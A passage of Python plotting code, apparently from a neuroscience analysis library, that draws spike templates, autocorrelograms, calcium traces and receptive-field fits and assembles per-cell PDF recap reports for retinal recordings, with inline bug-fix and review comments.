    selected_channels = selected_channels[selected_channels!=-1] #Removing the disabled channels
    shank_templates = templates[:,:,selected_channels]
    min_x = np.min(channel_positions[selected_channels][:,0])
    for i, pos in enumerate(channel_positions[selected_channels]):
        for j, cell in enumerate(cluster_composition):
            color = DEFAULT_COLORS[j%len(DEFAULT_COLORS)]
            # Traces scaled x4 and anchored at the channel's (x, y) position.
            ax.plot(np.arange(n_points)+pos[0]-min_x, shank_templates[cell,mask_trace,i]*4+pos[1], c=color)
    ax.set_title("Shank "+str(template_shank+1))
def plot_spike_template_MEA(ax, cluster_composition, templates, channel_positions):
    """Plot spike templates of a cluster on the MEA channels around the peak channel.

    The channel where the first cell's template has the largest absolute
    amplitude defines the centre; templates of every cell in
    *cluster_composition* are drawn on all channels within 100 units of it.
    """
    tmp = cluster_composition[0]
    n_points = 25
    # Window of samples around the template centre (10 before, rest after).
    mask_trace = np.arange(templates.shape[1]//2-10,
                           templates.shape[1]//2+(n_points-10))
    template_pos = channel_positions[np.where(np.abs(templates[tmp]) == np.max(np.abs(templates[tmp])))[1][0]]
    selected_channels = np.where(np.linalg.norm(channel_positions - template_pos, axis=1) < 100)[0]
    for i, pos in enumerate(channel_positions[selected_channels]):
        for j, cell in enumerate(cluster_composition):
            color = DEFAULT_COLORS[j%len(DEFAULT_COLORS)]
            # NOTE(review): indexes the template channel axis with the local
            # loop index i rather than selected_channels[i] — confirm whether
            # templates are already channel-restricted here.
            ax.plot(np.arange(n_points)+pos[0], templates[cell, mask_trace,i]*4+pos[1], c=color)
    ax.set_ylim(template_pos[1]-150, template_pos[1]+150)
    ax.set_xlim(template_pos[0]-150, template_pos[0]+150)
    # Bug fix: title the peak-channel position, not whichever channel the
    # loop happened to end on.
    ax.set_title("X/Y pos: "+str(template_pos[0])+"/"+str(template_pos[1]))
def plot_autocorrelogram(ax, cluster, spike_times, spike_clusters, bin_ms=.001, sampling_rate=30000, tails=30):
    """Plot the spike-train autocorrelogram of *cluster* on *ax*.

    Spike times (in samples at *sampling_rate*) are histogrammed into bins of
    *bin_ms* seconds, the histogram is correlated with a zero-padded copy of
    itself over +/- *tails* bins, and the trivial zero-lag peak is blanked.
    """
    cluster_mask = spike_clusters==cluster
    cluster_times = spike_times[cluster_mask]
    # Bug fix: np.linspace requires an integer sample count; passing the raw
    # float quotient raises TypeError on modern numpy, so truncate explicitly.
    n_bins = int(cluster_times[-1] / (bin_ms * sampling_rate))
    hist = np.histogram(cluster_times, bins=np.linspace(0, cluster_times[-1], n_bins))[0]
    hist_tails = np.concatenate(([0]*tails, hist, [0]*tails))
    corr = np.correlate(hist_tails, hist, mode="valid")
    corr[tails]=0  # blank the zero-lag autocorrelation peak
    ax.bar(np.linspace(-tails*bin_ms*1000,tails*bin_ms*1000,tails*2+1), corr, width=bin_ms*1000)
    ax.set_title("Autocorrelogram, bin="+str(bin_ms*1000)+"ms")
def plot_spike_amplitudes(ax, cluster, spike_templates, spike_clusters, spike_times, amplitudes, n_max_dots=5000):
    """Scatter spike amplitudes over time for a cluster, one color per template.

    ax -> matplotlib axis to draw on
    cluster -> cluster id to plot
    spike_templates -> template id of every spike
    spike_clusters -> cluster id of every spike
    spike_times -> spike times (x axis)
    amplitudes -> spike amplitudes (y axis)
    n_max_dots -> total dot budget, shared evenly between the cluster's templates
    """
    mask_cluster = spike_clusters==cluster
    clusters = np.unique(spike_templates[mask_cluster])
    points_per_cluster = n_max_dots//len(clusters)
    total_spikes = 0
    for templ in clusters:
        mask_template = spike_templates==templ
        n_spike_template = np.sum(mask_template)
        total_spikes+=n_spike_template
        # Evenly subsample the template's spikes to stay within the dot budget
        mask_selected_spikes = np.linspace(0, n_spike_template, min(n_spike_template, points_per_cluster), dtype=int, endpoint=False)
        # Bug fix: draw on the axis passed in, not on pyplot's current axes.
        ax.scatter(spike_times[mask_template][mask_selected_spikes], amplitudes[mask_template][mask_selected_spikes], s=1)
    ax.set_xticks([])
    ax.set_title("Spike amplitudes - n°spike: "+str(total_spikes))
def plot_cell_spatial(ax, cell_spatial):
    """Display a cell's spatial component as an image on the given axis."""
    ax.imshow(cell_spatial)
def plot_calcium_trace(ax, cell_trace):
    """Plot a cell's calcium trace, downsampled by a factor of 8 for speed."""
    step = 8
    sample_idx = range(0, len(cell_trace), step)
    ax.plot(sample_idx, cell_trace[::step], linewidth=.1)
    ax.set_xticks([])
    ax.set_title("Calcium activity")
def plot_stim_epochs_to_spikes(ax, reM, y_pos):
    """Overlay the stimulus epochs as horizontal bars, in spike-timepoint units.

    Bars are drawn at height y_pos; labels alternate above/below the bar so
    consecutive stimulus names don't overlap.
    """
    seq = reM._sequences[0]
    stim_names = seq.get_names_group("stim")
    # Start index of each stimulus in the sequence, used to order the bars
    start_indexes = np.array([seq._data_dict[name][0].idx for name in stim_names])
    label_side = 1
    for stim_idx in np.argsort(start_indexes):
        stim_name = stim_names[stim_idx]
        dc = seq._data_dict[stim_name][0]
        # Convert epoch bounds to timepoints through the main timepoint array
        epoch_start = seq["main_tp"][dc.idx]
        epoch_len = seq["main_tp"][dc.idx+len(dc)] - epoch_start
        ax.barh(y_pos, epoch_len, left=epoch_start, height=.1)
        ax.text(epoch_start, y_pos+(.1*label_side), stim_name, fontdict={"size":10})
        label_side *= -1
def plot_stim_epochs_to_calcium(ax, reM, y_pos):
    """Overlay the stimulus epochs as horizontal bars, in raw frame-index units.

    Same layout as plot_stim_epochs_to_spikes, but epoch bounds are the data
    chunk indexes themselves (no timepoint conversion).
    """
    seq = reM._sequences[0]
    stim_names = seq.get_names_group("stim")
    # Start index of each stimulus in the sequence, used to order the bars
    start_indexes = np.array([seq._data_dict[name][0].idx for name in stim_names])
    label_side = 1
    for stim_idx in np.argsort(start_indexes):
        stim_name = stim_names[stim_idx]
        dc = seq._data_dict[stim_name][0]
        ax.barh(y_pos, width=len(dc), left=dc.idx, height=.1)
        ax.text(dc.idx, y_pos+(.1*label_side), stim_name, fontdict={"size":10})
        label_side *= -1
def plot_stim_recap_table(ax, df):
    """Render a dataframe as a table that fills the whole axis.

    Column widths are proportional to the longest cell (or header) in each
    column, with a minimum of 5 characters.
    """
    col_sizes = [max(5, len(col), max(len(str(v)) for v in df[col]))
                 for col in df.columns]
    total_size = np.sum(col_sizes)
    widths = [size/total_size for size in col_sizes]
    header_row_colors = ['lightgray']*df.shape[1]
    body_row_colors = [['none']*df.shape[1] for _ in range(df.shape[0])]
    ax.table(cellText=np.vstack([df.columns, df.values]),
             cellColours=[header_row_colors] + body_row_colors,
             bbox=[0,0,1,1],
             colWidths=widths)
    ax.axis('off')
# Cell
def plot_composed_A_masks(ax, A_matrix):
    """Overlay all cells' spatial masks in distinct colors and label their centers.

    Each mask is normalized to [0, 1] and alpha-blended onto a white RGB
    canvas; the cell index is written at the mask's center of mass.
    """
    spatial_shape = A_matrix.shape[1:]
    composite = np.ones((3, *spatial_shape), dtype="float")
    centers = []
    for i, cell_A in enumerate(A_matrix):
        mask = cell_A/np.max(cell_A)
        hex_color = DEFAULT_COLORS[i%len(DEFAULT_COLORS)]
        # Parse "#RRGGBB" into normalized per-channel intensities
        channels = [int(hex_color[k:k+2], 16)/255 for k in (1, 3, 5)]
        layer = np.zeros((3, *spatial_shape), dtype="float")
        for c in range(3):
            layer[c] += channels[c]
        # Alpha-blend this cell's colored mask over the running composite
        composite = layer*mask + composite*(1-mask)
        centers.append(ndimage.measurements.center_of_mass(mask))
    ax.imshow(composite.T)
    for i, (x, y) in enumerate(centers):
        ax.text(x, y, str(i))
def plot_sta_positions(ax, stas):
    """Draw the fitted receptive-field ellipse of each cell's spatial STA.

    ax -> matplotlib axis to draw on
    stas -> STA matrix; assumes shape (n_cell, n_frames, height, width) — TODO confirm
    """
    for i, sta in enumerate(stas):
        color = DEFAULT_COLORS[i%len(DEFAULT_COLORS)]
        # Frame where the STA reaches its absolute extremum
        best_frame = np.unravel_index(np.argmax(np.abs(sta)), sta.shape)[0]
        sfit = fit_spatial_sta(sta[best_frame])
        # Bug fix: Ellipse expects degrees; the previous *180*np.pi multiplied
        # by pi instead of dividing. Assumes theta_1 is in radians — TODO confirm
        # against fit_spatial_sta.
        e = Ellipse(xy=[sfit["x0_1"], sta.shape[1]-sfit["z0_1"]],
                    width=sfit["sigma_x_1"], height=sfit["sigma_z_1"],
                    angle=np.degrees(sfit["theta_1"]), fill=False)
        ax.add_artist(e)
        e.set_clip_box(ax.bbox)
        e.set_alpha(.9)
        e.set_edgecolor(color)
        ax.text(e.center[0], e.center[1], str(i), horizontalalignment="center", verticalalignment="center")
    ax.set_xlim(0,sta.shape[2])
    ax.set_ylim(0,sta.shape[1])
# Cell
def plot_dome_flat(ax, sph_pos=None, **scatter_args):
    """Scatter LED positions of the dome on a polar plot.

    axis needs to be polar projection

    ax -> polar-projection axis, or None to create one
    sph_pos -> spherical positions; defaults to get_dome_positions(mode="spherical")
    scatter_args -> forwarded to ax.scatter (e.g. s, c, cmap, vmin, vmax)
    """
    if sph_pos is None:
        # Bug fix: the default was previously a call in the argument list,
        # evaluated once at import time; evaluate it lazily per call instead.
        sph_pos = get_dome_positions(mode="spherical")
    if ax is None:
        fig = plt.figure()
        ax = fig.add_subplot(111, projection='polar')
    sph_pos = np.reshape(sph_pos, (-1,3))
    # Column 2 is the azimuth (shifted by pi), column 1 the elevation
    ax.scatter(sph_pos[:,2]+np.pi, sph_pos[:,1], **scatter_args)
    ax.set_yticks(ticks=[])
    ax.set_xticks(ticks=[])
    ax.set_ylim(0,np.pi/2)
    # Bug fix: the `b=` keyword was removed in matplotlib 3.5 (renamed
    # `visible`); pass positionally for compatibility across versions.
    ax.grid(False)
def plot_dome_checker(sta, s=20, grid=None, pval=None):
    """Plot every frame of a dome checkerboard STA on its own polar subplot.

    sta -> STA frames, one dome frame per subplot
    s -> scatter dot size forwarded to plot_dome_flat
    grid -> optional GridSpec to draw into; created (rows of 8) when None
    pval -> optional p-value shown in the title of the second subplot
    """
    if grid is None:
        grid = gridspec.GridSpec(len(sta)//8 + 1, 8)
        for i, frame in enumerate(sta):
            # Bug fix: these axes must be polar like in the branch below
            # (plot_dome_flat requires a polar projection).
            ax = plt.subplot(grid[i//8, i%8], projection='polar')
            plot_dome_flat(ax, s=s, c=frame, vmin=-1, vmax=1, cmap="gray")
    else:
        # get_geometry() is deprecated since matplotlib 3.3; use the
        # nrows/ncols attributes instead.
        grid_x, grid_y = grid.nrows, grid.ncols
        for i in range(grid_x):
            for j in range(grid_y):
                ax = plt.subplot(grid[i*grid_y+j], projection='polar')
                plot_dome_flat(ax, s=s, c=sta[i*grid_y+j], vmin=-1, vmax=1, cmap="gray")
                if i==0 and j==1:
                    if pval is None:
                        ax.set_title("Checkerboard")
                    else:
                        ax.set_title("Checkerboard p="+format_pval(pval))
# Cell
def configure_pyplot_recap(small_size=14, medium_size=18, bigger_size=24):
    """Apply the font sizes used by the recap figures to pyplot and seaborn."""
    # Matplotlib rc settings
    plt.rc('font', size=small_size)
    plt.rc('axes', titlesize=small_size, labelsize=medium_size)
    plt.rc('xtick', labelsize=small_size)
    plt.rc('ytick', labelsize=small_size)
    plt.rc('legend', fontsize=small_size)
    plt.rc('figure', titlesize=bigger_size)
    # Mirror the same sizes in the seaborn context
    size_rc = {"font.size": small_size,
               "axes.titlesize": small_size,
               "axes.labelsize": medium_size,
               "xtick.labelsize": small_size,
               "ytick.labelsize": small_size,
               "legend.fontsize": small_size,
               "figure.titlesize": bigger_size}
    sns.set_context("notebook", rc=size_rc)
    sns.set_style("white")
    sns.set_style("ticks")
# Cell
def plot_recap_vivo_ephy(title_dict, reM, phy_dict, cluster_ids, df_stim, cell_db_ids=None,
                         checkerboard=None, fullfield_fl=None, fl_bars=None, chirp_am=None,
                         chirp_fm=None, moving_gratings=None, export_path="./recap_plot.pdf"):
    """Plot the recapitulating form of in vivo electrophy records
    title_dict -> A dictionnary containing the str info for the title: keys(condition, date, record_name, record_id)
    reM -> The record master object of the record
    phy_dict -> A dictionnary containing the matrix obtained from phy (see utils.phy_results_dict())
    cluster_ids -> A list of the cluster id used by phy corresponding to the good cells analysed
    cell_db_ids -> A list of the database ids of the cells corresponding to cluster_ids
    checkerboard -> A matrix of STA of cells to the checkerboard stimulus of shape (n_cell, 16, height, width)
    fullfield_fl -> A matrix of STA of cells to the fullfield_flicker stimulus of shape (n_cell, 16)
    fl_bars -> A matrix of STA of cells to the flickering_bars stimulus of shape (n_cell, 16, height, width)
    chirp_am -> A tuple of the chirp_am obtained from a pipe, where [0] is the stimulus and [1] the cells response
    chirp_fm -> Same as chirp_am but for a chirp_fm stimulus
    moving_gratings -> The dict of response obtained from utils.group_direction_response
    export_path -> The path for a pdf file to be exported. If None, the plot is displayed.
    """
    print("Generating the recap plot")
    # Switch pyplot/seaborn to the recap font sizes (restored at the end).
    configure_pyplot_recap()
    # Group probe channels per shank for the template plot of each cluster.
    shanks_idx = buszaki_shank_channels(phy_dict["channel_positions"])
    cond = title_dict["condition"]
    date = title_dict["date"]
    record_name = title_dict["record_name"]
    record_id = title_dict["record_id"]
    if cell_db_ids is None:
        # -1 marks cells without a database id.
        cell_db_ids = [-1]*len(cluster_ids)
    with PdfPages(export_path) as pp:
        #Plotting Cover
        fig = plt.figure(figsize=(8.267717*2,11.69291*2)) #A4 values in inches *2
        gs = gridspec.GridSpec(28, 20, left=0.05, right=.95, top=.92, bottom=.05, wspace=0.00, hspace=0.00)
        ax_rem = fig.add_subplot(gs[:10,2:-1])
        reM.plot(ax_rem)
        ax_stim_recap = fig.add_subplot(gs[11:16,:])
        plot_stim_recap_table(ax_stim_recap, df_stim)
        suptitle = " - ".join([cond, date, record_name+" n°"+str(record_id)])
        plt.suptitle(suptitle)
        pp.savefig()
        plt.close()
        # One PDF page per cluster.
        for cluster, cell_id in zip(cluster_ids, cell_db_ids):
            # Map the phy cluster id to the cell's row index in the reM data.
            # NOTE(review): assumes reM["S_matrix"][0].attrs["cell_map"] covers
            # every id in cluster_ids — confirm against the pipeline.
            reM_cell_idx = reM["S_matrix"][0].attrs["cell_map"][cluster]#np.where(cluster==cluster_ids)[0][0]
            fig = plt.figure(figsize=(8.267717*2,11.69291*2)) #A4 values in inches *2
            suptitle = " - ".join([cond, date, record_name+" n°"+str(record_id),
                                   "Cluster n°"+str(cluster), "Cell id n°"+str(cell_id)])
            plt.suptitle(suptitle)
            # Templates merged into this cluster during manual curation.
            mask_cluster = phy_dict["spike_clusters"]==cluster
            cluster_composition = np.unique(phy_dict["spike_templates"][mask_cluster])
            gs = gridspec.GridSpec(28, 20, left=0.05, right=.95, top=.92, bottom=.05, wspace=0.00, hspace=0.00)
            #Template on electrodes
            cell_loc_ax = fig.add_subplot(gs[0:4,0:2])
            plot_spike_template(cell_loc_ax, cluster_composition, phy_dict["templates"], shanks_idx, phy_dict["channel_positions"])
            #Autocorrelogram
            autocorr_ax = fig.add_subplot(gs[0:4,3:7])
            plot_autocorrelogram(autocorr_ax, cluster, phy_dict["spike_times"], phy_dict["spike_clusters"],
                                 bin_ms=.001, sampling_rate=30000, tails=30)
            #Spike amplitude across time
            sp_amp_ax = fig.add_subplot(gs[0:4,8:])
            plot_spike_amplitudes(sp_amp_ax, cluster, phy_dict["spike_templates"], phy_dict["spike_clusters"],
                                  phy_dict["spike_times"], phy_dict["amplitudes"])
            plot_stim_epochs_to_spikes(sp_amp_ax, reM, y_pos=0.6)
            #Checkerboard STA
            if checkerboard is not None:
                # Smallest non-zero p-value (zeros are treated as unset).
                pval_checker = checkerboard[1][reM_cell_idx]
                pval_checker = np.min(pval_checker[pval_checker!=0])
                inner_grid = gridspec.GridSpecFromSubplotSpec(4, 4,
                                subplot_spec=gs[5:12,0:12], wspace=.09, hspace=.13)
                plot_2d_sta(checkerboard[0][reM_cell_idx], pval=pval_checker, grid=inner_grid)
            #Fullfield flickering STA
            if fullfield_fl is not None:
                pval_fffl = fullfield_fl[1][reM_cell_idx]
                pval_fffl = np.min(pval_fffl[pval_fffl!=0])
                sp_amp_ax = fig.add_subplot(gs[5:12,13:])
                plot_t_sta(sp_amp_ax, fullfield_fl[0][reM_cell_idx], pval=pval_fffl)
            #Chirp_FM
            if chirp_fm is not None:
                chirpfm_ax = fig.add_subplot(gs[13:16,:])
                plot_chirp(chirpfm_ax, chirp_fm[0], chirp_fm[1][:,reM_cell_idx], smooth=False)
                chirpfm_ax.set_title("Chirp FM")
            #Chirp_AM
            if chirp_am is not None:
                chirpam_ax = fig.add_subplot(gs[17:20,:])
                plot_chirp(chirpam_ax, chirp_am[0], chirp_am[1][:,reM_cell_idx], smooth=False)
                chirpam_ax.set_title("Chirp AM")
            #Flickering bars
            if fl_bars is not None:
                pval_bars = fl_bars[1][reM_cell_idx]
                pval_bars = np.min(pval_bars[pval_bars!=0])
                fl_bars_ax = fig.add_subplot(gs[21:,:12])
                plot_fl_bars(fl_bars_ax, fl_bars[0][reM_cell_idx], pval=pval_bars)
            #Moving gratings
            if moving_gratings is not None:
                ds_ax = fig.add_subplot(gs[21:,13:], projection="polar")
                plot_ds_wheel(ds_ax, moving_gratings, cell_idx=reM_cell_idx)
            pp.savefig()
            plt.close()
            print("Cell cluster n°",cluster,"done")
    # Restore default matplotlib/seaborn styling.
    sns.set()
    plt.rcdefaults()
    print()
# Cell
def plot_recap_vivo_calcium(title_dict, reM, A_matrix, cell_traces, df_stim, cell_indexes=None, cell_db_ids=None,
                            checkerboard=None, fullfield_fl=None, fl_bars=None, chirp_am=None,
                            chirp_fm=None, moving_gratings=None, export_path="./recap_plot.pdf"):
    """Plot the recapitulating form of in vivo electrophy records
    title_dict -> A dictionnary containing the str info for the title: keys(condition, date, record_name, record_id)
    reM -> The record master object of the record
    A_matrix -> A matrix of the cell spatial components obtained from CaImAn
    cell_indexes -> A list of the indexes of the cell to plot. Leave to None for plotting all of them.
    cell_db_ids -> A list of the database ids of the cells in the order of the cells data index.
    checkerboard -> A matrix of STA of cells to the checkerboard stimulus of shape (n_cell, 16, height, width)
    fullfield_fl -> A matrix of STA of cells to the fullfield_flicker stimulus of shape (n_cell, 16)
    fl_bars -> A matrix of STA of cells to the flickering_bars stimulus of shape (n_cell, 16, height, width)
    chirp_am -> A tuple of the chirp_am obtained from a pipe, where [0] is the stimulus and [1] the cells response
    chirp_fm -> Same as chirp_am but for a chirp_fm stimulus
    moving_gratings -> The dict of response obtained from utils.group_direction_response
    export_path -> The path for a pdf file to be exported. If None, the plot is displayed.
    """
    print("Generating the recap plot")
    # Switch pyplot/seaborn to the recap font sizes (restored at the end).
    configure_pyplot_recap()
    cond = title_dict["condition"]
    date = title_dict["date"]
    record_name = title_dict["record_name"]
    record_id = title_dict["record_id"]
    if cell_indexes is None:
        cell_indexes = list(range(len(A_matrix)))
    if cell_db_ids is None:
        # -1 marks cells without a database id.
        cell_db_ids = [-1]*len(cell_indexes)
    with PdfPages(export_path) as pp:
        #Plotting Cover
        fig = plt.figure(figsize=(8.267717*2,11.69291*2)) #A4 values in inches *2
        gs = gridspec.GridSpec(28, 20, left=0.05, right=.95, top=.92, bottom=.05, wspace=0.00, hspace=0.00)
        ax_rem = fig.add_subplot(gs[:10,2:-1])
        reM.plot(ax_rem)
        ax_stim_recap = fig.add_subplot(gs[11:16,:])
        plot_stim_recap_table(ax_stim_recap, df_stim)
        ax_axon_terminals = fig.add_subplot(gs[17:27,1:10])
        plot_composed_A_masks(ax_axon_terminals, A_matrix)
        ax_sta_pos = fig.add_subplot(gs[20:25,11:])
        # NOTE(review): checkerboard defaults to None but is used here
        # unconditionally — this raises TypeError if it is not provided.
        # Confirm whether callers always pass it or a guard is missing.
        plot_sta_positions(ax_sta_pos, checkerboard[0])
        suptitle = " - ".join([cond, date, record_name+" n°"+str(record_id)])
        plt.suptitle(suptitle)
        pp.savefig()
        plt.close()
        # One PDF page per cell.
        for cell_idx, cell_db_id in zip(cell_indexes, cell_db_ids):
            fig = plt.figure(figsize=(8.267717*2,11.69291*2)) #A4 values in inches(damn) *2
            suptitle = " - ".join([cond, date, record_name+" n°"+str(record_id),
                                   "Cell n°"+str(cell_idx), "Cell DB id n°"+str(cell_db_id)])
            plt.suptitle(suptitle)
            gs = gridspec.GridSpec(28, 20, left=0.05,
                                   right=.95, top=.92,
                                   bottom=.05, wspace=0.00, hspace=0.00)
            #Template on electrodes
            cell_loc_ax = fig.add_subplot(gs[0:4,0:4])
            plot_cell_spatial(cell_loc_ax, A_matrix[cell_idx])
            #Spike amplitude across time
            calcium_trace_ax = fig.add_subplot(gs[0:4,5:])
            plot_calcium_trace(calcium_trace_ax, cell_traces[:, cell_idx])
            plot_stim_epochs_to_calcium(calcium_trace_ax, reM, y_pos=-0.3)
            #Checkerboard STA
            if checkerboard is not None:
                # Smallest non-zero p-value (zeros are treated as unset).
                pval_checker = checkerboard[1][cell_idx]
                pval_checker = np.min(pval_checker[pval_checker!=0])
                inner_grid = gridspec.GridSpecFromSubplotSpec(4, 4,
                                subplot_spec=gs[5:12,0:12], wspace=.09, hspace=.13)
                # [::4] keeps every 4th temporal frame to fit the 4x4 grid.
                plot_2d_sta(checkerboard[0][cell_idx][::4], pval=pval_checker, grid=inner_grid)
            #Fullfield flickering STA
            if fullfield_fl is not None:
                pval_fffl = fullfield_fl[1][cell_idx]
                pval_fffl = np.min(pval_fffl[pval_fffl!=0])
                sp_amp_ax = fig.add_subplot(gs[5:12,13:])
                plot_t_sta(sp_amp_ax, fullfield_fl[0][cell_idx], pval=pval_fffl)
            #Chirp_FM
            if chirp_fm is not None:
                chirpfm_ax = fig.add_subplot(gs[13:16,:])
                plot_chirp(chirpfm_ax, chirp_fm[0], chirp_fm[1][:,cell_idx])
                chirpfm_ax.set_title("Chirp FM")
            #Chirp_AM
            if chirp_am is not None:
                chirpam_ax = fig.add_subplot(gs[17:20,:])
                plot_chirp(chirpam_ax, chirp_am[0], chirp_am[1][:,cell_idx])
                chirpam_ax.set_title("Chirp AM")
            #Flickering bars
            if fl_bars is not None:
                pval_bars = fl_bars[1][cell_idx]
                pval_bars = np.min(pval_bars[pval_bars!=0])
                fl_bars_ax = fig.add_subplot(gs[21:,:12])
                plot_fl_bars(fl_bars_ax, fl_bars[0][cell_idx], pval=pval_bars)
                fl_bars_ax.set_title("Flickering_bars")
            #Moving gratings
            if moving_gratings is not None:
                #The very small values of calcium need a normalization to higher values
                # for plotting purpose
                # NOTE(review): this rescales the caller's moving_gratings dict
                # IN PLACE and re-applies the normalization on every cell
                # iteration — looks idempotent after the first pass, but
                # confirm this side effect is intended.
                all_val = None
                for i, (k,v) in enumerate(moving_gratings.items()):
                    if all_val is None:
                        all_val = np.zeros((len(moving_gratings), *v[0].shape))
                    all_val[i] = v[0]
                for k,v in moving_gratings.items():
                    moving_gratings[k] = ((v[0].T / np.max(all_val, axis=(0,2))).T*100, *v[1:])
                ds_ax = fig.add_subplot(gs[21:,13:], projection="polar")
                plot_ds_wheel(ds_ax, moving_gratings, cell_idx=cell_idx)
            pp.savefig()
            plt.close()
            print("Cell n°",cell_idx,"done")
    # Restore default matplotlib/seaborn styling.
    sns.set()
    plt.rcdefaults()
    print()
# Cell
def plot_recap_vitro_ephy(title_dict, reM, phy_dict, cluster_ids, df_stim, cell_db_ids=None,
                          checkerboard=None, fullfield_fl=None, fl_bars=None, chirp_am=None,
                          chirp_fm=None, moving_gratings=None, export_path="./recap_plot.pdf"):
    """Plot the recapitulating form of in vitro electrophy records
    title_dict -> A dictionnary containing the str info for the title: keys(condition, date, record_name, record_id)
    reM -> The record master object of the record
    phy_dict -> A dictionnary containing the matrix obtained from phy (see utils.phy_results_dict())
    cluster_ids -> A list of the cluster id used by phy corresponding to the good cells analysed
    cell_db_ids -> A list of the database ids of the cells corresponding to cluster_ids
    checkerboard -> A matrix of STA of cells to the checkerboard stimulus of shape (n_cell, 16, height, width)
    fullfield_fl -> A matrix of STA of cells to the fullfield_flicker stimulus of shape (n_cell, 16)
    fl_bars -> A matrix of STA of cells to the flickering_bars stimulus of shape (n_cell, 16, height, width)
    chirp_am -> A tuple of the chirp_am obtained from a pipe, where [0] is the stimulus and [1] the cells response
    chirp_fm -> Same as chirp_am but for a chirp_fm stimulus
    moving_gratings -> The dict of response obtained from utils.group_direction_response
    export_path -> The path for a pdf file to be exported. If None, the plot is displayed.
    """
    print("Generating the recap plot")
    # Switch pyplot/seaborn to the recap font sizes (restored at the end).
    # Unlike the in vivo variant, MEA recordings have no shank layout, so
    # plot_spike_template_MEA is used below instead of plot_spike_template.
    configure_pyplot_recap()
    cond = title_dict["condition"]
    date = title_dict["date"]
    record_name = title_dict["record_name"]
    record_id = title_dict["record_id"]
    if cell_db_ids is None:
        # -1 marks cells without a database id.
        cell_db_ids = [-1]*len(cluster_ids)
    with PdfPages(export_path) as pp:
        #Plotting Cover
        fig = plt.figure(figsize=(8.267717*2,11.69291*2)) #A4 values in inches *2
        gs = gridspec.GridSpec(28, 20, left=0.05, right=.95, top=.92, bottom=.05, wspace=0.00, hspace=0.00)
        ax_rem = fig.add_subplot(gs[:10,2:-1])
        reM.plot(ax_rem)
        ax_stim_recap = fig.add_subplot(gs[11:16,:])
        plot_stim_recap_table(ax_stim_recap, df_stim)
        suptitle = " - ".join([cond, date, record_name+" n°"+str(record_id)])
        plt.suptitle(suptitle)
        pp.savefig()
        plt.close()
        # One PDF page per cluster.
        for cluster, cell_id in zip(cluster_ids, cell_db_ids):
            # Map the phy cluster id to the cell's row index in the reM data.
            reM_cell_idx = reM["S_matrix"][0].attrs["cell_map"][cluster]#np.where(cluster==cluster_ids)[0][0]
            fig = plt.figure(figsize=(8.267717*2,11.69291*2)) #A4 values in inches *2
            suptitle = " - ".join([cond, date, record_name+" n°"+str(record_id),
                                   "Cluster n°"+str(cluster), "Cell id n°"+str(cell_id)])
            plt.suptitle(suptitle)
            # Templates merged into this cluster during manual curation.
            mask_cluster = phy_dict["spike_clusters"]==cluster
            cluster_composition = np.unique(phy_dict["spike_templates"][mask_cluster])
            gs = gridspec.GridSpec(28, 20, left=0.05, right=.95, top=.92, bottom=.05, wspace=0.00, hspace=0.00)
            #Template on electrodes
            cell_loc_ax = fig.add_subplot(gs[0:4,0:4])
            plot_spike_template_MEA(cell_loc_ax, cluster_composition, phy_dict["templates"], phy_dict["channel_positions"])
            #Autocorrelogram
            autocorr_ax = fig.add_subplot(gs[0:4,5:9])
            plot_autocorrelogram(autocorr_ax, cluster, phy_dict["spike_times"], phy_dict["spike_clusters"],
                                 bin_ms=.001, sampling_rate=30000, tails=30)
            #Spike amplitude across time
            sp_amp_ax = fig.add_subplot(gs[0:4,10:])
            plot_spike_amplitudes(sp_amp_ax, cluster, phy_dict["spike_templates"], phy_dict["spike_clusters"],
                                  phy_dict["spike_times"], phy_dict["amplitudes"])
            plot_stim_epochs_to_spikes(sp_amp_ax, reM, y_pos=0.6)
            #Checkerboard STA
            if checkerboard is not None:
                # Smallest non-zero p-value (zeros are treated as unset).
                pval_checker = checkerboard[1][reM_cell_idx]
                pval_checker = np.min(pval_checker[pval_checker!=0])
                inner_grid = gridspec.GridSpecFromSubplotSpec(4, 4,
                                subplot_spec=gs[5:12,0:12], wspace=.09, hspace=.13)
                plot_2d_sta(checkerboard[0][reM_cell_idx], pval=pval_checker, grid=inner_grid)
            #Fullfield flickering STA
            if fullfield_fl is not None:
                pval_fffl = fullfield_fl[1][reM_cell_idx]
                pval_fffl = np.min(pval_fffl[pval_fffl!=0])
                sp_amp_ax = fig.add_subplot(gs[5:12,13:])
                plot_t_sta(sp_amp_ax, fullfield_fl[0][reM_cell_idx], pval=pval_fffl)
            #Chirp_FM
            if chirp_fm is not None:
                chirpfm_ax = fig.add_subplot(gs[13:16,:])
                plot_chirp(chirpfm_ax, chirp_fm[0], chirp_fm[1][:,reM_cell_idx], smooth=False)
                chirpfm_ax.set_title("Chirp FM")
            #Chirp_AM
            if chirp_am is not None:
                chirpam_ax = fig.add_subplot(gs[17:20,:])
                plot_chirp(chirpam_ax, chirp_am[0], chirp_am[1][:,reM_cell_idx], smooth=False)
                chirpam_ax.set_title("Chirp AM")
            #Flickering bars
            if fl_bars is not None:
                pval_bars = fl_bars[1][reM_cell_idx]
                pval_bars = np.min(pval_bars[pval_bars!=0])
                fl_bars_ax = fig.add_subplot(gs[21:,:12])
                plot_fl_bars(fl_bars_ax, fl_bars[0][reM_cell_idx], pval=pval_bars)
            #Moving gratings
            if moving_gratings is not None:
                ds_ax = fig.add_subplot(gs[21:,13:], projection="polar")
                plot_ds_wheel(ds_ax, moving_gratings, cell_idx=reM_cell_idx)
            pp.savefig()
            plt.close()
            print("Cell cluster n°",cluster,"done")
    # Restore default matplotlib/seaborn styling.
    sns.set()
    plt.rcdefaults()
    print()
# Cell
def plot_recap_vivo_ephy_dome(title_dict, reM, phy_dict, cluster_ids, cell_db_ids=None,
                              checkerboard=None, fullfield_fl=None, chirp_am=None,
                              chirp_fm=None, moving_gratings=None, export_path="./recap_plot.pdf"):
    """Plot the recapitulating form of in vivo electrophy records
    title_dict -> A dictionnary containing the str info for the title: keys(condition, date, record_name, record_id)
    reM -> The record master object of the record
    phy_dict -> A dictionnary containing the matrix obtained from phy (see utils.phy_results_dict())
    cluster_ids -> A list of the cluster id used by phy corresponding to the good cells analysed
    cell_db_ids -> A list of the database ids of the cells corresponding to cluster_ids
    checkerboard -> A matrix of STA of cells to the checkerboard stimulus of shape (n_cell, 16, height, width)
    fl_bars -> A matrix of STA of cells to the flickering_bars stimulus of shape (n_cell, 16, height, width)
    chirp_am -> A tuple of the chirp_am obtained from a pipe, where [0] is the stimulus and [1] the cells response
    chirp_fm -> Same as chirp_am but for a chirp_fm stimulus
    moving_gratings -> The dict of response obtained from utils.group_direction_response
    export_path -> The path for a pdf file to be exported. If None, the plot is displayed.
